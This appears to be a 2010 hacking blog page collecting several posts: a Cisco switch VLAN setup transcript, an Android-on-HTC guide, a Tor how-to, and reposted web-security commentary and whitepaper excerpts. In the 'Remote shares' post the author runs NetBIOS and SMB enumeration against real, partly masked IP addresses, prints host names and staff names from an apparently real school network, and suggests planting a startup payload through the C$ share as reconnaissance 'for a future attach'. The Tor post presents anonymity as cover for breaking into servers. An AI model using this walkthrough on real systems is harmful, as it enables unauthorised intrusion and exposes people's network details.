Tuesday, November 2, 2010

Configure Cisco Router

Well this is going to be a two part hack. I configured a cisco switch for 3 diffrent VlAN's I'll be using 2 of the VLAN's please look at the config for any questions this is on a Catalyst 3500 XL switch.

Continue with configuration dialog? [yes/no]:
% Please answer 'yes' or 'no'.
Continue with configuration dialog? [yes/no]:
% Please answer 'yes' or 'no'.
Continue with configuration dialog? [yes/no]: no
Press RETURN to get started.


Switch>en
Switch#config t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#int
% Incomplete command.

Switch(config)#
Switch(config)#interface ?
FastEthernet FastEthernet IEEE 802.3
GigabitEthernet GigabitEthernet IEEE 802.3z
Multilink Multilink-group interface
Port-channel Ethernet Channel of interfaces
VLAN Switch VLAN Virtual Interface
Virtual-TokenRing Virtual TokenRing

Switch(config)#interface
% Incomplete command.

Switch(config)#interface Fast
Switch(config)#interface FastEthernet0/1
Switch(config-if)#?
Interface configuration commands:
arp Set arp type (arpa, probe, snap) or timeout
bandwidth Set bandwidth informational parameter
carrier-delay Specify delay for interface transitions
cdp CDP interface subcommands
custom-queue-list Assign a custom queue list to an interface
default Set a command to its defaults
delay Specify interface throughput delay
description Interface specific description
duplex Configure duplex operation.
exit Exit from interface configuration mode
fair-queue Enable Fai
help Description of the interactive help system
hold-queue Set hold queue depth
keepalive Enable keepalive
load-interval Specify interval for load calculation for an
interface
logging Configure logging for interface
loopback Configure internal loopback on an interface
mac-address Manually set interface MAC address
max-reserved-bandwidth Maximum Reservable Bandwidth on an
media-type Interface media type
mtu Set the interface Maximum Transmission Unit
(MTU)
mvr MVR per port configuration
negotiation Select Autonegotiation mode
no Negate a command or set its defaults
port Perform switch port configuration
power power configuration
priority-group Assign a priority group to an interface
random-detect Enable Weighted Random Ea
Interface
rmon Configure Remote Monitoring on an interface
service-policy Configure QoS Service Policy
shutdown Shutdown the selected interface
snmp Modify SNMP interface parameters
spanning-tree Spanning Tree Subsystem
speed Configure speed operation.
switchport Set switching mode characteristics
timeout Define timeout values for this interface
transmit-interface Assign a transmit interface to a
receive-only
interface
tx-queue-limit Configure card level transmit queue limit
udld Configure UDLD enabled or disabled and
ignore global
UDLD setting

Switch(config-if)#^Z
Switch#
00:13:29: %SYS-5-CONFIG_I: Configured from console by consoleshow vtp
status
VTP Version : 2
Configuration Revision : 0
Maximum VLANs supported locally : 254
Number of existing VLANs : 5
VTP Operating Mode : Server
VTP Domain Name :
VTP Pruning Mode : Disabled
VTP V2 Mode : Disabled
VTP Traps Generation : Disabled
MD5 digest : 0xBF 0x86 0x94 0x45 0xFC 0xDF 0xB5
0x70
Configuration last modified by 0.0.0.0 at 0-0-00 00:00:00
Switch#show vlan
VLAN Name Status Ports
---- -------------------------------- ---------
--------------------------
1 default active Fa0/1, Fa0/2, Fa0/3,
Fa0/4,
Fa0/5, Fa0/6, Fa0/7,
Fa0/8,
Fa0/9, Fa0/10, Fa0/11,
Fa0/12,
Fa0/13, Fa0/14,
Fa0/15, Fa0/16,
Fa0/17, Fa0/18,
Fa0/19, Fa0/20,
Fa0/21, Fa0/22,
Fa0/23, Fa0/24,

1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active

VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode
Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- --------
------ ------
1 enet 100001 1500 - - - - - 1002
1003
1002 fddi 101002 1500 - - - - - 1
1003
1003 tr 101003 1500 1005 0 - - srb 1
1002
1004 fdnet 101004 1500 - - 1 ibm - 0
0
1005 trnet 101005 1500 - - 1 ibm - 0
0
Switch#vlan database
Switch(vlan)#vtp server
Device mode already VTP SERVER.
Switch(vlan)#vlan 2 name test
VLAN 2 added:
Name: test
Switch(vlan)#exit
APPLY completed.
Exiting....
Switch#show vlan
VLAN Name Status Ports
---- -------------------------------- --
1 default active Fa0/1, Fa0/2, Fa0/3,
Fa0/4,
Fa0/5, Fa0/6, Fa0/7,
Fa0/8,
Fa0/9, Fa0/10, Fa0/11,
Fa0/12,
Fa0/13, Fa0/14,
Fa0/15, Fa0/16,
Fa0/17, Fa0/18,
Fa0/19, Fa0/20,
Fa0/21, Fa0/22,
Fa0/23, Fa0/24,

2 test active
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active

VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode
Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- --------
------ ------
1 enet 100001 1500 - - - - - 1002
1003
2 enet 100002 1500 - - - -
1002 fddi 101002 1500 - - - - - 1
1003
1003 tr 101003 1500 1005 0 - - srb 1
1002
1004 fdnet 101004 1500 - - 1 ibm - 0
0
1005 trnet 101005 1500 - - 1 ibm - 0
0
Switch#vlan database
Switch(vlan)#vtp server
Device mode already VTP SERVER.
Switch(vlan)#vlan 3 name test2
VLAN 3 added:
Name: test2
Switch(vlan)#exit
APPLY completed.
Exiting....
Switch#config t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#int vlan2
Switch(config-subif)#management
Switch(config-subif)#
Switch#
00:19:43: %SYS-5-CONFIG_I: Configured from console by consoleconfig t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)#int fa
Switch(config)#int fastEthernet 0/5
Switch(config-if)#switchport access vlan2
^
% Invalid input detected at '^' marker.

Switch(config-if)#switchport access vlan 2
Switch(confi
Switch(config)#inter
Switch(config)#interface fast
Switch(config)#interface fastEthernet 0/6
Switch(config-if)#switchport access vlan 2
Switch(config-if)#exit
Switch(config)#interface fastEthernet 0/7
Switch(config-if)#switchport access vlan 2
Switch(config-if)#exit
Switch(config)#interface fastEthernet 0/10
Switch(config-if)#switchport access vlan 3
Switch(config-if)#exit
Switch(config)#interface fastEthernet 0/11
Switch(config-if)#switchport access vlan 3
Switch(config-if)#exit
Switch(config)#interface fastEther
Switch(config-if)#switchport access vlan 3
Switch(config-if)#exit
Switch(config)#end
Switch#write
00:23:15: %SYS-5-CONFIG_I: Configured from console by console memorey
^
% Invalid input detected at '^' marker.

Switch#write memory
Building configuration...
[OK]
Switch#show vlan
VLAN Name Status Ports
---- -------------------------------- --------- -------------------------------
1 default active Fa0/1, Fa0/2, Fa0/3, Fa0/4,
Fa0/8, Fa0/9, Fa0/13, Fa0/14,
Fa0/15, Fa0/16, Fa0/17, Fa0/18,
Fa0/19, Fa0/20, Fa0/21, Fa0/22,
Fa0/23, Fa0/24, Gi0/1, Gi0/2
2 test active Fa0/5, Fa0/6, Fa0/7
3 test2 active Fa0/10, Fa0/11, Fa0/12
1002 fddi-default active
1003 token-ring-default active
1004 fddinet-default active
1005 trnet-default active

VLAN Type SAID MTU Parent RingNo BridgeNo Stp BrdgMode Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
1 enet 100001 1500 - - - - - 1002 1003
2 enet 100002 1500 - - - - - 0 0
3 enet 100003 1500 - - - - - 0 0
1002 fddi 101002 1500 - - - - - 1 1003
1003 tr 101003 1500 1005 0 - - srb 1 1002
1004 fdnet 101004 1500 - - 1 ibm - 0 0
1005 trnet 101005 1500 - - 1 ibm - 0 0
Switch#

Remote shares



I came across this googling for exploits and It's really good for Recon. It uses port 139. So you need to find the Netbios name of the target computer, Microsoft makes this very easy. Once you find a target with 139 open issue the following command.

$nmblookup -A 12.***.58.154

The -A switch signifys a remote host. You will get some out put among the lines of.

Looking up status of 12.***.58.154
BROOKS <00> - M
ARROWSIGN <00> - M
BROOKS <20> - M
ARROWSIGN <1e> - M

MAC Address = 00-C0-A8-83-19-5D

So now we have a Netbios name "BROOKS" So to follow this up we are going to do the following command.

$smbclient -LBROOKS -I 12.***.58.154
Password:
Domain=[ARROWSIGN] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Sharename Type Comment
--------- ---- -------
IPC$ IPC Remote IPC
SharedDocs Disk
print$ Disk Printer Drivers
ADMIN$ Disk Remote Admin
C$ Disk Default share
Domain=[ARROWSIGN] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Server Comment
--------- -------

Workgroup Master
--------- -------

I just hit return for the password and it shows a list of shares on that machine, c$ is my favorite share thats why I posted this example you can have access to the whole C:\ Drive with the c$ share you can set a payload to startup on logon etc..

Like I said before I just use this technique for information gathering for a future attach. I'll show you another example of some information you can get from this.

$ smbclient -LWEBSERVER -I 12.***.54.11
Password:
Anonymous login successful
Domain=[LORETTO] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]

Sharename Type Comment
--------- ---- -------
Error returning browse list: NT_STATUS_ACCESS_DENIED
Anonymous login successful
Domain=[LORETTO] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]

Server Comment
--------- -------
ARAMIREZ
BUFFY Buffy Computer
BUSINESSSERVER
CHOFFMAN2
CHOFFMANN Cindy Hoffmann
CPELL
CSANTOYO
DESTINEYELELAB1
DESTINEYELEMLAB
DMUNOZ
ELEMPRINCIPAL IBM 2003_25
ELEMRECEP IBM2003_#29
ELEM_LIBRARY
EMATA
FAMNET
FESERVER
IPORTILLO
KIMPELL2 Dianne Kimpell
LMIRANDA
LORETTO2
LORETTO2A
MATA
NNIETO Teacher Computer
PHERRERA2 Patty Herrera
POLIVAS Patso Olivas
PRYHERD Teacher Computer
PS-55DAE6
RECORDS
RENRIQUEZ
SASI
SPACE
SVR-APP02
SVR-PDC
TEC2
WEBSERVER

Workgroup Master
--------- -------
101 TEACHER101
LORETTO SVR-PDC
WORKGROUP SPAREIBM

This tells you pretty much all the computers on the network, It tells you the domain and other trusted domains and It can also tell you the DC or GC server, very useful information gathering, it's essentially a map of someones LAN.

Enjoy
-Sumit-

Installing Android on HTC Touch


Interested in Android but think you need to buy a new phone to try it out? Actually, your Windows Mobile phone may already have the capability of running Android. Today we show you how and the type of phone you’ll need.
sshot-2010-07-07-[22-09-07]
Installing Android
To run Android you will need a microSD card that is not SDHC (typically a card less than 2GB) and a supported Windows Mobile phone (see below). You can check your microSD card compatibility by looking at the card to see if it shows the “HC” label.
The microSD card will need to be formatted in FAT32. Plug the microSD card into the computer and right click on it and choose format.
Note: Formatting a microSD drive will erase everything on that drive. Make sure you have any important files backed up before you format it.
Now that the microSD card is formatted, the first step to installing Android is finding the right Android port for your phone (see below). You will need to find the port that works on your phone as well as the version of Android you want to run. Versions start at 1.0 but typically you will find ports for version 1.6 or 2.1.
Once you have found the right port for your phone and Android version you want to use, extract the files to a folder using 7-zip.
After the files have extracted there should be a folder called “andboot”. Go into the andboot folder and there will be another folder called “startup config” or “startup”. Open this folder and you will need to find the right startup.txt file for your phone. Inside each folder will be a single “startup.txt” file. Copy the file for your phone model to the root of the andboot folder. This file will tell Android what type of hardware you have, how big your screen is, how much RAM your phone has etc. so it is very important to choose the right file. If you are confused on what these phone names are please read below on finding your phone model.
Once you have moved the correct startup.txt file to the andboot folder, copy the entire andboot folder to the root of your newly formatted microSD card.
Plug the microSD card back in the phone and open the file browser on your phone and browse to the memory card. Make sure the phone is plugged into power before the next few steps because on some phones running on battery may cause the phone to hang.
Open the andboot folder and run haret.exe. If the right startup.txt file is in the root of the andboot folder you should be able to click “Run” and you will get a quick loading screen while haret turns off Windows Mobile and starts up Android.
You should get some scrolling text and probably a nice Android logo while the phone boots up the first time.
Note: The first boot is going to take a considerably longer time than subsequent boots. and you may need to calibrate your screen during the boot process so make sure you keep an eye on it.
Once the basic Linux settings are done your new “Android” phone will boot to a welcome screen so you can walk through the rest of the settings like setting up your email account.
Tip: If you are running Android on a phone that does not have an active data plan but does have wifi, you can get around the startup screen by tapping on the welcome screen in this order: top left corner, top right corner, bottom right corner, bottom left corner then tap the Android logo. You can then enable wifi and join a network and set up your gmail account manually.
It is usually recommended that you leave your phone alone while it syncs your information for at least 10 minutes. Once the initial syncing is done the phone should start running faster and you can play around with installing apps. If you don’t wait for the phone to fully sync you may have problems with apps crashing prematurely and a force close dialog popping up.
Change any settings and install any apps you want, they will be saved to your memory card and ready on next boot. All phones that run Android from the microSD card will automatically boot Windows Mobile when the phone restarts. To run Android again, just open the file browser and run haret.exe again.
Android Ports
There are a few different Android ports for Windows Mobile devices and each one supports a different family of device; each family of device has a varying amount of hardware support. Most phones will support the touch screen, hardware buttons, cell phone radio, and data connection, but some ports may not support bluetooth, GPS, or power management. This is not a complete list of Android ports available, but it should cover the most popular Windows Mobile phones.
Almost all Android development on Windows Mobile phones started with the development on theHTC Touch (also known as the HTC Vogue and the Verizon xv6900). The HTC Touch has 100% of the hardware features working and even some features that were not available in official Windows Mobile ROMs. One of the main differences between Android for the Touch and Android for every other phone is the Touch allows for Android to be flashed to the phone’s ROM (NAND memory). This was a big break through for Android development and has increased battery life and speed greatly. Running Android on the Touch can be done following the steps above but it is recommended to run Android by flashing the phones NAND memory. To learn how to do that, start at the Android Touch FAQ thread at XDA-Developers.
Android ports for the HTC Touch can also be used on the following phones with varying success.
  • HTC Nike (Neon)
  • HTC Polaris (Touch Cruise)
  • HTC Kaiser (TyTN II)
  • HTC Titan (Mogul, xv6800)
Note: HTC phones all have proper names that come from HTC and in many cases each carrier will give the phone its own branding and rename the phone to something else. For example, the HTC Titan was called the Mogul on Sprint and the xv6800 on Verizon. To find the Android port for your phone, start by finding the proper HTC name of your device. Start on HTC’s site to discover your device’s official name.
XDAndroid supports the most popular touch screen HTC Windows Mobile phones and if you bought a touch screen HTC Windows Mobile phone within the past year, most likely this port will support your phone. XDAndroid runs directly from the phones microSD memory card on the following phones:
  • Touch Pro (Fuze, RAPH, RAPH800, RAPH500)
  • Touch Diamond (DIAMOND, DIAM500)
  • Touch HD (BLACKSTONE)
  • GSM Touch Pro2 (TILT2,RHODIUM, RHOD400, RHOD500)
  • GSM Touch Diamond2 (TOPAZ)
Andromnia is an Android port for Samsung devices. Currently this port is in the pre-alpha stages and things like the headset speaker does not work. But if you want to test it out it supports the following phones:
  • Samsung i900 (GSM, supported worldwide)
  • Samsung i910 (CDMA, used by Verizon in the US)
  • Samsung i780 (Mirage)
  • Samsung i907 (AT&T Epix)
Wing Linux isn’t as quickly developed as XDAndroid but should get the job done if your phone isn’t supported by any other port. Wing Linux supports the following phones to varying degrees:
  • HTC Artemis
  • HTC Elf, HTC Elfin
  • HTC Excalibur, T-Mobile Dash
  • HTC Gene, HTC P3400
  • HTC Herald, T-Mobile Wing
  • HTC Opal, HTC Touch Viva
  • HTC Pharos
  • HTC Prophet
  • HTC Startrek
  • HTC Wizard
  • Asus P320, Galaxi Mini
You may also want to look at threads for the following phones to check the status of Android on these phones.
Extra links
If you still can’t find what you are looking for I recommend checking out these links for more information.

How to surf web anonymously with TOR



We all many times use proxies for staying anonymous on internet. Lets quickly check out , what we are actually doing
while using proxies. We first connect to a proxy server which brings resources requested by us from the web server.

    
Thus a proxy server hides our identity by acting as an intermediary between us and the web server that we are accessing. Suppose we break into a server using a proxy server thinking that we are anonymous. But what if owner of web server starts enquiring about the clients connecting to it using the proxy server  and it is possible that owners of proxy server might  reveal our identity. This means we cant actually rely on proxy servers for being anonymous online. Here comes the concept of THE ONION ROUTING (TOR) into picture. By using this , the client traffic is supposed to be passed from three different servers or nodes before reaching to actual web server. It may randomly take any path through any three nodes.

Lets consider it has taken path shown by green arrows. Now

* Node 1 knows only actual origin(client) but not actual destinantion(web server).
*Node 5 neither knows actual origin nor actual destinantion.
*Node 9 knows actual destination but not actual origin.

Thus no one exactly knows which client is accessing which web server. So it is highly anonymous.

Installing and Using TOR.

Step 1. Download the TOR client from the given link and run the setup .
   
http://www.ziddu.com/download/12331095/vidalia-bundle-0.2.1.26-0.2.10-1.exe.html

Note: You need to install a Mozilla firefox add on which is included in package you have downloaded to use Tor.





                                          
Step 2. Open the 'Vidalia Control Panel' from the task bar and Click on 'Start Tor'.

                         
Step3. Now open Mozilla Firefox browser, single click on red highlighted 'Tor Disabled' on right corner of browser and it will turn to green highlighted 'Tor Enabled'.

Now just log on to 'www.whatismyip.com' and you will see your new public IP address that will keep changing after an interval of time according to the path randomly taken by web traffic through three different nodes.

Monday, October 25, 2010

Best of Application Security


Ten of Application Security industry's coolest, most interesting, important, and entertaining links from the past week -- in no particular order.

WASC Threat Classification to OWASP Top Ten RC1 Mapping


Update 01.05.2009: From feedback received, added some TCv2 classes that also map.

With most of the work done by Bil Corry (@bilcorry), here is a solid first pass at creating a mapping between the newly released WASC's Threat Classification v2 and OWASP's Top Ten 2010 RC1. This should help those actively using one or both of use documents.

To disable IE8's XSS Filter or not?

Since this article was published, Major IE8 flaw makes 'safe' sites unsafe, I’ve fielded a number of inquiries asking for guidance. Should they follow Google’s lead and proactively disable IE8’s XSS Filter (X-XSS-Protection: 0) until a patch is made available or leave it enabled? Without getting into any technical detail, here are my thoughts on the matter:

If your organization is REALLY concerned about XSS attacks, is VERY confident the website in question is one of the very few completely free from XSS issues (as apparently Google is), and is prepared to fix any XSS issues that surface within DAYS -- then you may consider disabling the XSS Filter to reduce any remaining attack surface until a patch arrives.

On the other hand if you are like most who have XSS, or don't know if they do or not, then leave the XSS Filter alone to do its job -- give your IE8 users a fighting chance.

In absense of a security strategy


From experience working with all manner of organizations there are a number of unique security strategies present in the industry. Since every business operates differently, perhaps there is no right or wrong approach. That is, as long as the approach is properly aligned with the goals of the business. If not, the end result will lead to failure and in my opinion represents one of the largest, if not the largest, challenges presently facing the industry. That along with “justification,” which is probably the same thing.

Here are the strategies I’ve managed to identify:

Incident Response (aka: public relations)
Ensure that the exact types of previous break-ins, that have also been publicly attributed to the organization, will (hopefully) never happen again. Organize a set of public relations talking points for media inquiry in case it does.

Compliance (aka: satisfy the checkbox)
Satisfy audit requirements for any/all applicable regulations where failure will result in significant business loss. Ignore the rest until they do. Decisions on whether a particular security safeguard is required should be left to the discretion of the on-site auditor, but only after appropriate organizational push back.

Risk Management (aka: control-based)
Implement minimum industry accepted best-practices controls that establish a defensible due diligence posture in the event of incident or public inquiry. Engage with a well-known security consultancy that may positively attest to your organizations adherence via a thorough risk assessment.

Business Continuity (aka: keep the boss happy)
Address any security issues that have previously inhibited managements ability to use email or view online adult entertainment. Other outstanding risks are considered secondary and should be revisited periodically by the security steering committee.

Threat-based
Identify and categorize the various threat agent that must be successfully defended against. Actively monitor threat agent activity, implement security control that limit their capabilities, and generate business-level activity reports.

Competitive Advantage (aka: customer-based)
Obtain a list of essential security controls from key customers/prospects, competitor technical literature, and provide assurance to customers that these highest standards of due care have been implemented.

Obviously many of these descriptions are meant to be humors while still reflecting some resemblance of today's organizational reality. Most organization adopt more than a single strategy to form their own unique hybrid approach to information security.

Best of Application Security

Ten of Application Security industry's coolest, most interesting, important, and entertaining links from the past week -- in no particular order.

10 Things You Should Know about Website Security

Download Whitepaper ›››

Phishing schemes. Stolen credit card numbers. Identity theft. Websites have emerged as the target of choice for money hungry hackers. Attacks have moved from the network layer to the Web application layer that people use to manage their lives everyday: online shopping and banking, healthcare information management, insurance payments, travel booking and college applications.
The ramifications for companies are clear: Loss of data, loss of consumer confidence and loss of brand integrity. No company can afford the black mark of a website hack. With many states mandating full disclosure, and the federal government close behind with its own efforts, the luxury of keeping these incidents behind closed doors has passed. Organizations must develop a strategy for complete website vulnerability management.
How can companies prevent these attacks? The first step is to understand the fundamentals. This white paper will examine ten vital website security issues that affect software developers and information security professionals. Grasping these points will enable companies to understand the scope of the problem, and establish realistic approaches for vulnerability management and securing their websites. Consider these ten points a springboard for further exploration of website security so that your organization and customers can avoid being victimized.

Ten Things You Should Know about Website Security

1. The Network Perimeter is Vanishing

Companies can no longer tout a locked down perimeter as the ultimate defense. Hundreds of millions of people worldwide use the Internet to bank, shop, purchase goods and services, and perform research. With each transaction, private information, including names, addresses, phone numbers, credit/debit card numbers, and passwords, is routinely transferred and stored in a variety of locations. To enable this flow of information, organizations must open up their firewalls, the very devices once thought to offer impenetrable protection. Billions of dollars and millions of personal identities and private information are exposed to hackers who find their way in through security vulnerabilities in custom Web applications.
From a security perspective, firewalls and SSL offer little protection. Web traffic often contains attacks such as Cross-Site Scripting (XSS) and SQL Injection that enter through Port 80 and are not blocked by the firewall. Contrary to a popular market misconception, SSL is not capable of securing a website, but instead is tasked with safeguarding data in transit. Once data is on the Web server, it can be compromised whether or not SSL is in use.
Website security is a specialized practice that focuses solely on the custom Web applications that sit on corporate Web servers. Network scanning covers packaged, off-the-shelf applications. Applications developed in-house (the vast majority of websites) need custom security to fend off the attacks that bypass the network perimeter.

2. Over 80% of Websites have Security Vulnerabilities

Consider the fact that 8 out of 10 websites visited each day have a serious security vulnerability that puts corporate and customer data at risk. Add to that the irreparable harm done to a company whose brand is compromised by a publicized attack. It’s a call to action for any company doing any of its business on the Web.
WhiteHat Security, through its unique vulnerability management service, assesses the security of some of the largest and most visible websites in the e-commerce, financial services, and healthcare industries. Based on the aggregate data of thousands of website assessments, we‘ve determined that over 80% of websites have vulnerabilities. These vulnerabilities enable a hacker to access customer account data, execute administrative level functions, defraud the business, or halt operations, all serious business impacts.
Website vulnerabilities fall into twenty-four classes, as determined by the Web Application Security Consortium (WASC). Within those classes, there are vulnerabilities from the common, like SQL Injection and Cross-Site Scripting, to the obscure, like Abuse of Functionality and Insufficient Process Validation. The most important thing to remember here is that when you’re talking about custom Web application vulnerabilities, they will be unique to your website. And, it takes a joint effort between the development and security teams to identify and resolve issues.
Download Whitepaper ›››

Cross Site Scripting (XSS) Worms and Viruses

Website Security Whitepaper

Download a Complimentary Copy of this Whitepaper ›››

On October 4, 2005, the "Samy Worm" became the first major worm to use Cross-Site Scripting2 (“XSS”) for infection propagation. Overnight, the worm altered over one million personal user profiles on MySpace.com, the most popular social networking site in the world. The worm infected the site with JavaScript viral code and made Samy, the hacker, everyone's pseudo "friend" and "hero." MySpace, at the time home to over 32 million users and a top-10 trafficked website in the U.S. (Based on Alexa rating), was forced to shutdown in order to stop the onslaught.
Samy, the author of the worm, was on a mission to be famous, and as such the payload was relatively benign. But, consider what he might have done with control of over one million Web browsers and the gigabits of bandwidth at their disposal – browsers that were also potentially logged-in to Google, Yahoo, Microsoft Passport, eBay, Web banks, stock brokerages, blogs, message boards, or any other custom Web applications. It’s critical that we begin to understand the magnitude of the risk associated with XSS malware and the ways that companies can defend themselves and their users, especially when the malware originates from trusted websites and aggressive authors.

In this white paper we will provide an overview of XSS; define XSS worms; and, examine propagation methods, infection rates, and potential impact. Most importantly, we will outline immediate steps enterprises can take to defend their
websites.

10 Quick Facts About XSS Viruses and Worms:
What You Need to Know Now

XSS Outbreaks:

  1. Are likely to originate on popular websites with community-driven features such as social networking, blogs, user reviews, message boards, chat rooms, Web mail, and wikis.
  2. Can occur at any time because the vulnerability (Cross-Site Scripting) required for propagation exists in over 80% of all websites.
  3. Are capable of propagating faster and cleaner than even the most notorious worms such as Code Red, Slammer and Blaster.
  4. Could create a Web browser botnet enabling massive DDoS attacks. The potential also exists to damage data, send spam, or defraud customers.
  5. Maintain operating system independence (Windows, Linux, Macintosh OS X, etc.), since execution occurs in the Web browser.
  6. Circumvent network congestion by propagating in a Web server-to-Web browser (client-server) model rather than a typical blind peer-to-peer model.
  7. Do not rely on Web browser or operating system vulnerabilities.
  8. May propagate by utilizing third-party providers of Web page widgets (advertising banners, weather and poll blocks, JavaScript RSS feeds, traffic counters, etc.).
  9. Will be a challenge to spot because the network behavior of infected browsers remains relatively unchanged and the JavaScript exploit code is hard to distinguish from normal Web page markup.
  10. Are easier to stop than traditional Internet viruses because denying access to the infectious website will quarantine the spread.
Read more... Download a Complimentary Copy of this Whitepaper ›››